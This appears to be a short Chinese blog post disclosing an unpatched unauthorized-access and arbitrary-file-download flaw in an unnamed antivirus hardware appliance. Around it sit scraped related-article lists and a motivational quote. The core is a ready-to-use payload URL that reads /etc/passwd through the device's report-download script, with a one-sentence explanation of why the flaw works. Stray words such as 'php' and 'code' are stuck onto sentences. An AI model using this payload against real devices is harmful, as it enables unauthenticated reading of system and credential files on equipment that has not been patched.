某安全設備未受權訪問+任意文件下載0day
具體是哪家就不說了,硬件盒子,主要檢測病毒。php
payload以下:spa
https://xxx.xxx.xxx.xxx/downTxtFile.php?filename=/etc/passwd
比較簡單,當時有獲取報告的功能,本身傳入的物理路徑,能夠未受權訪問直接下載設備上的文件。code
相關文章
- 1. jenkins 未受權訪問-任意命令執行
- 2. Zookeeper未受權訪問
- 3. ZooKeeper 未受權訪問
- 4. LDAP未受權訪問
- 5. 任意文件下載
- 6. ES文件管理器未受權訪問漏洞(CVE-2019-6447)
- 7. ES文件管理器未受權訪問漏洞——CVE-2019-6447
- 8. redis未受權訪問漏洞
- 9. 未受權訪問總結學習
- 10. rsync 未受權訪問漏洞
- 更多相關文章...
- • ASP.NET MVC - 安全 - ASP.NET 教程
- • Swift 訪問控制 - Swift 教程
- • Docker容器實戰(七) - 容器眼光下的文件系統
- • IDEA下SpringBoot工程配置文件沒有提示
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. jenkins 未受權訪問-任意命令執行
- 2. Zookeeper未受權訪問
- 3. ZooKeeper 未受權訪問
- 4. LDAP未受權訪問
- 5. 任意文件下載
- 6. ES文件管理器未受權訪問漏洞(CVE-2019-6447)
- 7. ES文件管理器未受權訪問漏洞——CVE-2019-6447
- 8. redis未受權訪問漏洞
- 9. 未受權訪問總結學習
- 10. rsync 未受權訪問漏洞